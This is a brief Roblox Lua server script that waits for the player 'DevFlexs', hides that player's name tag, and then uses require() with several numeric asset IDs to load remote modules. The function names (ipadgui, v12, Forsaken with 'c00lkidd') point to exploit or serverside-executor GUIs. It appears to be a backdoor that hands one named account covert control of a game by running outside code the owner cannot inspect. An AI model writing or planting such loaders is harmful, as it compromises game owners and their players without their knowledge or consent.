wait(20)
if game.Players:FindFirstChild("DevFlexs") then
game.Players["DevFlexs"].Character.Head.NameTag.NameFln.Text = ""

---game.Players["DevFlexs"].Character.Head.NameTag.NameFln.TextColor3 = Color3.new(24, 0, 0)
require(110476458714336).ipadgui("DevFlexs")
spawn(function()
require(89709417365094).Forsaken("DevFlexs", "c00lkidd")
require(18461650402)("DevFlexs")
end)
spawn(function()
require(5679036702).UWU("DevFlexs")
require(95408358312065).v12("DevFlexs")
end)

require(112709453567134).kud("DevFlexs", "1")

else
warn()

end

